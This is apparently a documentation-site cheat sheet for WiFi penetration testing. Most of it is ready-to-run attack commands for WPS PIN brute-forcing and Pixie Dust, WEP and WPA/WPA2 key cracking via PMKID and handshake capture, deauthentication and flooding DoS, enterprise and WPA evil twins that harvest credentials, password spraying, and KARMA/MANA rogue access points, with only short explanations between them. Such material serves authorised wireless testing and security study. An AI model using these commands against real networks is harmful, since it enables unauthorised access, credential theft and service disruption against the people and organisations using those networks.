Skip to main content

Basic WiFi Commands

ip link show                          # List available interfaces
airmon-ng check kill                  # Kill interfering processes
airmon-ng start wlan0                 # Enable monitor mode
airmon-ng stop wlan0mon               # Disable monitor mode
airodump-ng wlan0mon                  # Scan 2.4 GHz networks
airodump-ng wlan0mon --band a         # Scan 5 GHz networks
airodump-ng wlan0mon --wps            # Show WPS-enabled APs
iw dev wlan0 scan | grep "^BSS\|SSID\|WPA" # Quick scan summary

Essential Tools

Airgeddon

All-in-one bash script covering WEP, WPA-PSK, WPS, Evil Twin, and Enterprise attacks with a guided menu.
docker run --rm -ti --name airgeddon \
  --net=host --privileged -p 3000:3000 \
  v1s1t0r1sh3r3/airgeddon

EAPHammer

Focused on WPA-Enterprise attacks, EAP downgrade, and credential capture.
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Wifite2

Automates WPS/WEP/WPA-PSK attacks: sets monitor mode, scans, selects targets, and runs appropriate attacks.

wifiphisher

Performs Evil Twin, KARMA, and Known Beacons attacks combined with phishing templates to capture PSKs or portal credentials.

WPS Attacks

WPS (Wi-Fi Protected Setup) uses an 8-digit PIN validated in two halves, giving only ~11,000 effective combinations.

WPS Brute Force

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

WPS Pixie Dust Attack

Some APs use predictable nonces (E-S1, E-S2), making the WPS PIN recoverable offline: 
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

# Without monitor mode
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null PIN Attack

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

WEP

WEP is broken due to the tiny 24-bit IV space, RC4 keystream reuse, and unkeyed CRC32 integrity. A practical break: 
# Collect IVs
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon

# Speed up with ARP replay
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon

# Crack with PTW attack
aircrack-ng wep_capture-01.cap

WPA/WPA2 PSK

PMKID Attack (No Client Needed)

Capture a single EAPOL frame from the AP — no connected client required: 
airmon-ng check kill && airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git && cd hcxdumptool && make && make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

# Convert and crack
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt

WPA Handshake Capture

# Monitor the target AP
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

# Force re-authentication via deauth
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0

# Crack the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

WPA Enterprise (MGT)

EAP Authentication Methods

Sends the MD5 hash of the password. Not recommended — vulnerable to dictionary attacks and provides no server authentication.
Uses both client-side and server-side certificates. Strong when certificates are properly managed.
Creates a TLS tunnel, then authenticates via MSCHAPv2 inside. The most common enterprise method — the MSCHAPv2 challenge can be captured and cracked.
Provides mutual authentication through an encrypted tunnel. Only server-side certificates required; client uses credentials.

Username Capture

Even with PEAP-EAP-TLS, usernames are sent in plaintext in the EAP “Response Identity” message: 
# Capture auth with airodump + wireshark, then filter:
# Display filter: eapol
# Look for "Response, Identity" packet

Enterprise Evil Twin

# Generate certificates
./eaphammer --cert-wizard

# Launch EAP Evil Twin
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

EAP Brute-Force (Password Spray)

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
  --interface-pool wlan0 wlan1 \
  --essid example-wifi \
  --password bananas \
  --user-list users.txt

DoS Attacks

# Deauthentication attack (aireplay-ng)
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

# Beacon flooding (create fake APs)
mdk4 wlan0mon b -a -w nta -m

# EAPOL flooding
mdk4 wlan0mon e -t EF:60:69:D7:69:2F

Evil Twin & Rogue AP Attacks

1

Open Evil Twin

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
Useful for capturing captive portal credentials and performing LAN attacks on connected clients.
2

WPA/WPA2 Evil Twin

Lure clients with a matching SSID and WPA2. Without the PSK the 4-way handshake will not complete, but you can capture it for cracking.
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
3

Enterprise Evil Twin

Downgrade authentication to capture credentials:
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

KARMA, MANA, and Known Beacons

AttackDescription
KARMARogue AP responds to all probe requests, tricking devices into connecting
MANACaptures PNLs from broadcast probes and responds with known SSIDs
Loud MANABroadcasts responses for all ESSIDs seen in nearby devices’ PNLs
Known BeaconsBrute-forces ESSID list, responding to any name in a wordlist
# MANA attack
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt

# Known Beacons
./eaphammer -i wlan0 --mana --known-beacons --known-ssids-file wordlist.txt

References

Build docs developers (and LLMs) love

Get started for freeTalk to us